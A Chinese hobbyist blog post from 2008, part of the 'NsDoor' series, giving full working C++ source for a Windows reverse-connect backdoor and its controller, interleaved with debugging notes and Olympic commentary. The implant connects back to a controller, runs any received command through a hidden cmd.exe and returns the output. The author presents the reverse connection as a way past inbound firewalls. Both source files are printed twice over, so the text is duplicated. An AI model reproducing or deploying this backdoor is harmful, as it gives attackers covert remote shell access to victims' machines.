循环渐进NsDoor(四)
女单决赛之张宁拿到冠军我很开心….
今天还算顺利,写反弹木马(姑且叫木马,其实才是个后门)的时候客户端和服务端都没有出现太大的问题,可是ReadFile函数还是会读不出数据,而且会程序死在那里…我可不敢怀疑是MS的问题,正在努力寻找答案中…
调试的时候出了个很大的意外,在单步跟的时候,突然程序卡住了,VS08一直显示正在运行,不正在调试了,当时正好执行在Sleep(300)那句后面的跳转上,我当时还以为是在执行Sleep(300)那系统真的睡着了呢….就在我惊诧间,之见VS给了我个MESSAGE,上面显示:程序有可能出现死锁(大意如此)….
后来发现是ReadFile()出现的死锁…(原因:父进程自己也握着管道的写端hWritePipe,子进程没有输出时ReadFile既读不到数据、也等不到EOF,就会一直阻塞。要么在ReadFile之前先用PeekNamedPipe看看管道里有没有数据,要么让父进程在CreateProcess之后关掉自己那份写端,只让子进程持有。)
然后我关闭后再调试一次,我靠,更大的意外,系统蓝屏了!!!!
这是我在VISTA下第一次遇到的蓝屏,雷死我了…
顿时想到:奥运会那张图片,蓝屏的投影显示在了那个东东上,够雷人…
不过我不惧艰险,继续调试…
终于,没在出现蓝屏和死锁……………………
今天准备给反弹木马加上密码验证的,但是想到别人又可能截包得到密码(这条TCP连接完全是明文的,密码、命令和回显都能被抓包看到),所以无论验证放在客户端还是服务端都挡不住截包…要防重放至少得用挑战—应答,要防窃听就得给整条连接加密,但是现在还不安全…
想到用MD5(严格说MD5是哈希不是加密,而且直接发密码的MD5值一样会被截下来原样重放),后来想这么多函数,怎么塞进shellcode嘛..
给服务端加了不是CMD命令的执行功能(一个例子而已,证明可以,并且方便以后扩展,就是一个退出的ns exit命令.而且有点逻辑错误,懒得改了,跳的位置不对而已)…
先给服务端:
Reverse.cpp
#include<iostream>
#include<winsock2.h>
#pragma comment(lib,"Ws2_32")
#define PORT 1517
#define IP "127.0.0.1"
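int main()
{
    // Reverse-connect command backdoor ("server" side, as the post calls it).
    // It dials IP:PORT, then for each 200-byte frame it receives runs the text
    // through "cmd.exe /c" and answers with one fixed 1024-byte frame holding
    // whatever the child wrote to stdout/stderr. Frames starting with "ns" are
    // reserved for built-in commands; only "ns exit" exists so far.
    //
    // NOTE(review): there is no authentication and no encryption on this
    // channel -- whoever is listening on IP:PORT gets a shell as this user,
    // and anyone on the path can read every command and reply.
    WSADATA ws;
    if (WSAStartup(MAKEWORD(2, 2), &ws) != 0)
        return 1;

    SOCKET sockfd = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
    if (sockfd == INVALID_SOCKET)
    {
        WSACleanup();
        return 1;
    }

    struct sockaddr_in server;
    ZeroMemory(&server, sizeof server);
    server.sin_family = AF_INET;
    server.sin_port = htons(PORT);
    server.sin_addr.S_un.S_addr = inet_addr(IP);

    // Keep dialling until the controller is listening (this is what makes the
    // connection "reverse"), but sleep between attempts instead of spinning.
    while (connect(sockfd, (struct sockaddr*)&server, sizeof server) == SOCKET_ERROR)
        Sleep(1000);

    // One anonymous pipe, reused for every command: the child's stdout/stderr
    // go into hWritePipe and we read them back from hReadPipe.
    SECURITY_ATTRIBUTES pipeattr;
    pipeattr.nLength = sizeof(SECURITY_ATTRIBUTES);   // was a hard-coded 12 (only right for 32-bit builds)
    pipeattr.bInheritHandle = TRUE;                   // the child must inherit the write end
    pipeattr.lpSecurityDescriptor = NULL;
    HANDLE hReadPipe = NULL, hWritePipe = NULL;
    if (!CreatePipe(&hReadPipe, &hWritePipe, &pipeattr, 0))
    {
        closesocket(sockfd);
        WSACleanup();
        return 1;
    }
    // The child only needs the write end; don't leak our read end into it.
    SetHandleInformation(hReadPipe, HANDLE_FLAG_INHERIT, 0);

    STARTUPINFOA si;
    ZeroMemory(&si, sizeof si);
    si.cb = sizeof si;                                // required by CreateProcess; was left at 0
    si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
    si.wShowWindow = SW_HIDE;
    si.hStdOutput = si.hStdError = hWritePipe;
    // Deliberately no stdin pipe (hStdInput stays NULL): the child cannot prompt us.

    PROCESS_INFORMATION pi;
    char Command[256] = {0};   // "cmd.exe /c" (10) + 199-byte request + NUL; the old 200 overflowed strcat_s
    char Buf[1024] = {0};      // one reply frame; sent whole, zero-padded
    char RecvBuf[200] = {0};   // one request frame, as sent by the controller
    DWORD lBytesRead = 0;

    for (;;)
    {
        // The controller sends exactly 200 bytes per command (assumes one recv
        // returns the whole frame, as the original did).
        int n = recv(sockfd, RecvBuf, sizeof RecvBuf, 0);
        if (n <= 0)
            break;   // peer closed or socket error: stop instead of re-running an empty command forever
        RecvBuf[sizeof RecvBuf - 1] = '\0';   // never trust the peer to NUL-terminate

        if (RecvBuf[0] == 'n' && RecvBuf[1] == 's')
        {
            // Extension hook for things a cmd.exe pipe can't do. Only "ns exit"
            // is implemented; any other "ns ..." still gets a reply frame so the
            // controller's blocking recv() does not hang.
            if (strcmp(RecvBuf, "ns exit") == 0)
                break;
            strcpy_s(Buf, sizeof Buf, "unknown ns command");
            send(sockfd, Buf, sizeof Buf, 0);
            ZeroMemory(Buf, sizeof Buf);
        }
        else
        {
            strcpy_s(Command, sizeof Command, "cmd.exe /c");
            strcat_s(Command, sizeof Command, RecvBuf);
            ZeroMemory(&pi, sizeof pi);
            if (CreateProcessA(NULL, Command, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi))
            {
                // Give the command up to a second (the old fixed Sleep(1000)),
                // returning early when it finishes; then drop the handles we
                // never used, which the original leaked on every command.
                WaitForSingleObject(pi.hProcess, 1000);
                CloseHandle(pi.hThread);
                CloseHandle(pi.hProcess);

                // Our own copy of hWritePipe is still open, so a bare ReadFile
                // blocks forever when the child printed nothing -- the hang seen
                // while debugging. Ask how much is buffered before reading.
                DWORD avail = 0;
                lBytesRead = 0;
                if (PeekNamedPipe(hReadPipe, NULL, 0, NULL, &avail, NULL) && avail > 0)
                    ReadFile(hReadPipe, Buf, sizeof Buf - 1, &lBytesRead, NULL);
                Buf[lBytesRead] = '\0';
                // Anything beyond 1023 bytes stays in the pipe and comes out on
                // the next command (the "leftover output" the post describes).
            }
            else
            {
                // Don't spin retrying as the original did; tell the controller.
                strcpy_s(Buf, sizeof Buf, "CreateProcess failed");
            }
            // Fixed-size frame: the controller reads exactly one per command.
            send(sockfd, Buf, sizeof Buf, 0);
            ZeroMemory(Buf, sizeof Buf);
            Sleep(100);
        }
        ZeroMemory(Command, sizeof Command);
        ZeroMemory(RecvBuf, sizeof RecvBuf);
    }

    CloseHandle(hReadPipe);
    CloseHandle(hWritePipe);
    closesocket(sockfd);
    WSACleanup();
    return 0;
}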
#include<iostream>
#include<winsock2.h>
#pragma comment(lib,"Ws2_32")
#define PORT 1517
#define IP "127.0.0.1"
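int main()
{
    // Reverse-connect command backdoor ("server" side, as the post calls it).
    // It dials IP:PORT, then for each 200-byte frame it receives runs the text
    // through "cmd.exe /c" and answers with one fixed 1024-byte frame holding
    // whatever the child wrote to stdout/stderr. Frames starting with "ns" are
    // reserved for built-in commands; only "ns exit" exists so far.
    //
    // NOTE(review): there is no authentication and no encryption on this
    // channel -- whoever is listening on IP:PORT gets a shell as this user,
    // and anyone on the path can read every command and reply.
    WSADATA ws;
    if (WSAStartup(MAKEWORD(2, 2), &ws) != 0)
        return 1;

    SOCKET sockfd = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
    if (sockfd == INVALID_SOCKET)
    {
        WSACleanup();
        return 1;
    }

    struct sockaddr_in server;
    ZeroMemory(&server, sizeof server);
    server.sin_family = AF_INET;
    server.sin_port = htons(PORT);
    server.sin_addr.S_un.S_addr = inet_addr(IP);

    // Keep dialling until the controller is listening (this is what makes the
    // connection "reverse"), but sleep between attempts instead of spinning.
    while (connect(sockfd, (struct sockaddr*)&server, sizeof server) == SOCKET_ERROR)
        Sleep(1000);

    // One anonymous pipe, reused for every command: the child's stdout/stderr
    // go into hWritePipe and we read them back from hReadPipe.
    SECURITY_ATTRIBUTES pipeattr;
    pipeattr.nLength = sizeof(SECURITY_ATTRIBUTES);   // was a hard-coded 12 (only right for 32-bit builds)
    pipeattr.bInheritHandle = TRUE;                   // the child must inherit the write end
    pipeattr.lpSecurityDescriptor = NULL;
    HANDLE hReadPipe = NULL, hWritePipe = NULL;
    if (!CreatePipe(&hReadPipe, &hWritePipe, &pipeattr, 0))
    {
        closesocket(sockfd);
        WSACleanup();
        return 1;
    }
    // The child only needs the write end; don't leak our read end into it.
    SetHandleInformation(hReadPipe, HANDLE_FLAG_INHERIT, 0);

    STARTUPINFOA si;
    ZeroMemory(&si, sizeof si);
    si.cb = sizeof si;                                // required by CreateProcess; was left at 0
    si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
    si.wShowWindow = SW_HIDE;
    si.hStdOutput = si.hStdError = hWritePipe;
    // Deliberately no stdin pipe (hStdInput stays NULL): the child cannot prompt us.

    PROCESS_INFORMATION pi;
    char Command[256] = {0};   // "cmd.exe /c" (10) + 199-byte request + NUL; the old 200 overflowed strcat_s
    char Buf[1024] = {0};      // one reply frame; sent whole, zero-padded
    char RecvBuf[200] = {0};   // one request frame, as sent by the controller
    DWORD lBytesRead = 0;

    for (;;)
    {
        // The controller sends exactly 200 bytes per command (assumes one recv
        // returns the whole frame, as the original did).
        int n = recv(sockfd, RecvBuf, sizeof RecvBuf, 0);
        if (n <= 0)
            break;   // peer closed or socket error: stop instead of re-running an empty command forever
        RecvBuf[sizeof RecvBuf - 1] = '\0';   // never trust the peer to NUL-terminate

        if (RecvBuf[0] == 'n' && RecvBuf[1] == 's')
        {
            // Extension hook for things a cmd.exe pipe can't do. Only "ns exit"
            // is implemented; any other "ns ..." still gets a reply frame so the
            // controller's blocking recv() does not hang.
            if (strcmp(RecvBuf, "ns exit") == 0)
                break;
            strcpy_s(Buf, sizeof Buf, "unknown ns command");
            send(sockfd, Buf, sizeof Buf, 0);
            ZeroMemory(Buf, sizeof Buf);
        }
        else
        {
            strcpy_s(Command, sizeof Command, "cmd.exe /c");
            strcat_s(Command, sizeof Command, RecvBuf);
            ZeroMemory(&pi, sizeof pi);
            if (CreateProcessA(NULL, Command, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi))
            {
                // Give the command up to a second (the old fixed Sleep(1000)),
                // returning early when it finishes; then drop the handles we
                // never used, which the original leaked on every command.
                WaitForSingleObject(pi.hProcess, 1000);
                CloseHandle(pi.hThread);
                CloseHandle(pi.hProcess);

                // Our own copy of hWritePipe is still open, so a bare ReadFile
                // blocks forever when the child printed nothing -- the hang seen
                // while debugging. Ask how much is buffered before reading.
                DWORD avail = 0;
                lBytesRead = 0;
                if (PeekNamedPipe(hReadPipe, NULL, 0, NULL, &avail, NULL) && avail > 0)
                    ReadFile(hReadPipe, Buf, sizeof Buf - 1, &lBytesRead, NULL);
                Buf[lBytesRead] = '\0';
                // Anything beyond 1023 bytes stays in the pipe and comes out on
                // the next command (the "leftover output" the post describes).
            }
            else
            {
                // Don't spin retrying as the original did; tell the controller.
                strcpy_s(Buf, sizeof Buf, "CreateProcess failed");
            }
            // Fixed-size frame: the controller reads exactly one per command.
            send(sockfd, Buf, sizeof Buf, 0);
            ZeroMemory(Buf, sizeof Buf);
            Sleep(100);
        }
        ZeroMemory(Command, sizeof Command);
        ZeroMemory(RecvBuf, sizeof RecvBuf);
    }

    CloseHandle(hReadPipe);
    CloseHandle(hWritePipe);
    closesocket(sockfd);
    WSACleanup();
    return 0;
}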
再给客户端:
NsClient.cpp
#include<iostream>
#include<winsock2.h>
#include<string.h>
using namespace std;
#pragma comment(lib,"Ws2_32")
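int main()
{
    // Controller side of the reverse shell ("client" in the post's naming).
    // Listens on PORT, accepts the first peer that dials in, then loops:
    // read a command line from the console, send it as one fixed 200-byte
    // frame, print the fixed 1024-byte reply frame.
    //
    // NOTE(review): binds every interface with no authentication -- whatever
    // connects to PORT first is treated as the backdoor, and the session is
    // plaintext end to end.
    const int PORT = 1517;
    const int BACKLOG = 2;   // the fixed port is meant to be patched in by a builder later

    WSADATA ws;
    if (WSAStartup(MAKEWORD(2, 2), &ws) != 0)
        return 1;

    SOCKET listenfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (listenfd == INVALID_SOCKET)
    {
        WSACleanup();
        return 1;
    }

    struct sockaddr_in server_addr;
    ZeroMemory(&server_addr, sizeof server_addr);
    server_addr.sin_family = AF_INET;
    server_addr.sin_port = htons(PORT);
    server_addr.sin_addr.s_addr = ADDR_ANY;

    // The original ignored these results; a port already in use would have
    // left it blocked forever in accept() on an unbound socket.
    if (bind(listenfd, (struct sockaddr*)&server_addr, sizeof server_addr) == SOCKET_ERROR
        || listen(listenfd, BACKLOG) == SOCKET_ERROR)
    {
        cout << "bind/listen failed: " << WSAGetLastError() << endl;
        closesocket(listenfd);
        WSACleanup();
        return 1;
    }

    int sin_size = sizeof server_addr;
    SOCKET new_fd = accept(listenfd, (struct sockaddr*)&server_addr, &sin_size);
    if (new_fd == INVALID_SOCKET)
    {
        cout << "accept failed: " << WSAGetLastError() << endl;
        closesocket(listenfd);
        WSACleanup();
        return 1;
    }
    closesocket(listenfd);   // one session only; stop accepting further peers

    char Command[200] = {0};   // one request frame
    char Buf[1025] = {0};      // one 1024-byte reply frame plus a guaranteed NUL for cout
    cout << " -------------------------*******************-------------------------" << endl;
    cout << " - -" << endl;
    cout << " - Welcome to a magic world,NewSketcher~ -" << endl;
    cout << " - -" << endl;
    cout << " - QQ:381002948 E-mail:ns517@126.com -" << endl;
    cout << " - -" << endl;
    cout << " -------------------------*******************-------------------------" << endl;
    cout << endl;
    cout << "Connection OK!" << endl << "You can input the CmdLine OR ." << endl << endl;

    for (;;)
    {
        cout << "CmdLine:" ">";
        if (!cin.getline(Command, sizeof Command))
        {
            if (cin.eof())
                break;   // console closed: leave instead of re-prompting forever
            // Line longer than the frame: discard the rest and ask again.
            cin.clear();
            char c;
            while (cin.get(c) && c != '\n') {}
            cout << "command too long (max 199 chars)" << endl;
            continue;
        }

        // Whole 200-byte frame goes out, NUL padding included; the backdoor
        // reads exactly 200 bytes per command.
        send(new_fd, Command, sizeof Command, 0);

        // Assumes one recv returns the whole 1024-byte reply (as the original
        // did); a short read just prints less, it never runs past the buffer.
        int n = recv(new_fd, Buf, sizeof Buf - 1, 0);
        if (n <= 0)
            break;   // backdoor went away ("ns exit", crash, or socket error)
        Buf[n] = '\0';
        cout << Buf << endl;

        memset(Command, 0, sizeof Command);
        memset(Buf, 0, sizeof Buf);
    }

    closesocket(new_fd);
    WSACleanup();
    return 0;
}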
#include<iostream>
#include<winsock2.h>
#include<string.h>
using namespace std;
#pragma comment(lib,"Ws2_32")
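int main()
{
    // Controller side of the reverse shell ("client" in the post's naming).
    // Listens on PORT, accepts the first peer that dials in, then loops:
    // read a command line from the console, send it as one fixed 200-byte
    // frame, print the fixed 1024-byte reply frame.
    //
    // NOTE(review): binds every interface with no authentication -- whatever
    // connects to PORT first is treated as the backdoor, and the session is
    // plaintext end to end.
    const int PORT = 1517;
    const int BACKLOG = 2;   // the fixed port is meant to be patched in by a builder later

    WSADATA ws;
    if (WSAStartup(MAKEWORD(2, 2), &ws) != 0)
        return 1;

    SOCKET listenfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (listenfd == INVALID_SOCKET)
    {
        WSACleanup();
        return 1;
    }

    struct sockaddr_in server_addr;
    ZeroMemory(&server_addr, sizeof server_addr);
    server_addr.sin_family = AF_INET;
    server_addr.sin_port = htons(PORT);
    server_addr.sin_addr.s_addr = ADDR_ANY;

    // The original ignored these results; a port already in use would have
    // left it blocked forever in accept() on an unbound socket.
    if (bind(listenfd, (struct sockaddr*)&server_addr, sizeof server_addr) == SOCKET_ERROR
        || listen(listenfd, BACKLOG) == SOCKET_ERROR)
    {
        cout << "bind/listen failed: " << WSAGetLastError() << endl;
        closesocket(listenfd);
        WSACleanup();
        return 1;
    }

    int sin_size = sizeof server_addr;
    SOCKET new_fd = accept(listenfd, (struct sockaddr*)&server_addr, &sin_size);
    if (new_fd == INVALID_SOCKET)
    {
        cout << "accept failed: " << WSAGetLastError() << endl;
        closesocket(listenfd);
        WSACleanup();
        return 1;
    }
    closesocket(listenfd);   // one session only; stop accepting further peers

    char Command[200] = {0};   // one request frame
    char Buf[1025] = {0};      // one 1024-byte reply frame plus a guaranteed NUL for cout
    cout << " -------------------------*******************-------------------------" << endl;
    cout << " - -" << endl;
    cout << " - Welcome to a magic world,NewSketcher~ -" << endl;
    cout << " - -" << endl;
    cout << " - QQ:381002948 E-mail:ns517@126.com -" << endl;
    cout << " - -" << endl;
    cout << " -------------------------*******************-------------------------" << endl;
    cout << endl;
    cout << "Connection OK!" << endl << "You can input the CmdLine OR ." << endl << endl;

    for (;;)
    {
        cout << "CmdLine:" ">";
        if (!cin.getline(Command, sizeof Command))
        {
            if (cin.eof())
                break;   // console closed: leave instead of re-prompting forever
            // Line longer than the frame: discard the rest and ask again.
            cin.clear();
            char c;
            while (cin.get(c) && c != '\n') {}
            cout << "command too long (max 199 chars)" << endl;
            continue;
        }

        // Whole 200-byte frame goes out, NUL padding included; the backdoor
        // reads exactly 200 bytes per command.
        send(new_fd, Command, sizeof Command, 0);

        // Assumes one recv returns the whole 1024-byte reply (as the original
        // did); a short read just prints less, it never runs past the buffer.
        int n = recv(new_fd, Buf, sizeof Buf - 1, 0);
        if (n <= 0)
            break;   // backdoor went away ("ns exit", crash, or socket error)
        Buf[n] = '\0';
        cout << Buf << endl;

        memset(Command, 0, sizeof Command);
        memset(Buf, 0, sizeof Buf);
    }

    closesocket(new_fd);
    WSACleanup();
    return 0;
}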
仔细看后,你会发现,原来反弹的原理就是把客户端当服务端(监听、accept),把服务端当客户端(主动connect),汗…
while(connect(sockfd,(struct sockaddr*)&server,sizeof server) == -1);//我喜欢这样写,呵呵
服务端的这句话,看明白没。。。其实就是等着我们来连接他…
反弹的好处就是:现在是服务端主动往外连,只拦入站连接的防火墙就拦不住它了;反过来客户端要开监听端口,倒会被拦截,不过没关系,客户端在攻击机上,我们直接放行就OK了,啊哈哈(注意:如果目标那边的防火墙连出站连接也过滤,反弹照样会被挡住。)
惯例,测试报告,还是在本机用127.0.0.1 1517测试,一般网上的反弹后门都是用telnet和NC做客户端,但是我为了扩展性,还是自己写了客户端…
编译后:
上图里的EXE为客户端和服务端
运行服务端(服务端没加那句隐藏代码,想加的自己加上就行了):
为了程序大小和性能,我吝啬的把输入输出都舍了,汗…
客户端:
是不是和以前的正向连接差不多,呵呵
我就是直接抄的前面的代码…
还有,顺便说下,客户端和服务端谁先运行都没得关系的..
执行命令看下:
Dir的结果
Net user的结果
Net time&net share的结果..(&的作用)
我怎么开了这么多共享…..
Ping的结果,因为有时间问题(服务端只Sleep(1000)然后ReadFile一次,ping跑的时间超过一秒,剩下的输出那时还没写进管道),所以所有消息没有完全返回,怎么办?
看见没,什么命令都不输入,它会把没显示完的信息再显示出来,跟下程序就明白原因了:管道只建了一次,每条命令只ReadFile一次、最多取1024字节,没取完的输出就留在管道里,下一次(哪怕是空命令)再读就被带出来了,其实算是个小bug吧…
再看不是CMD的命令..
我的想法是所有特殊命令前面都加上标识ns
执行ns exit
貌似没什么特别,但是服务端此时已经关闭了,其实这也算是个小BUG,怎么让它不是退出,而是重新初始化,等待下次连接,其实很简单的,改个跳转就行了,我就不改了…
啊啊啊啊啊啊啊!中国男篮又出现了,我是边看电视边写的!!!!
孙悦很好很强大,我喜欢
易建联又来关键球,刘伟最后抢断诺维斯基!!!
大家都是好样的~~~
----------------------------by NewSketcher
Time: 080816 21:47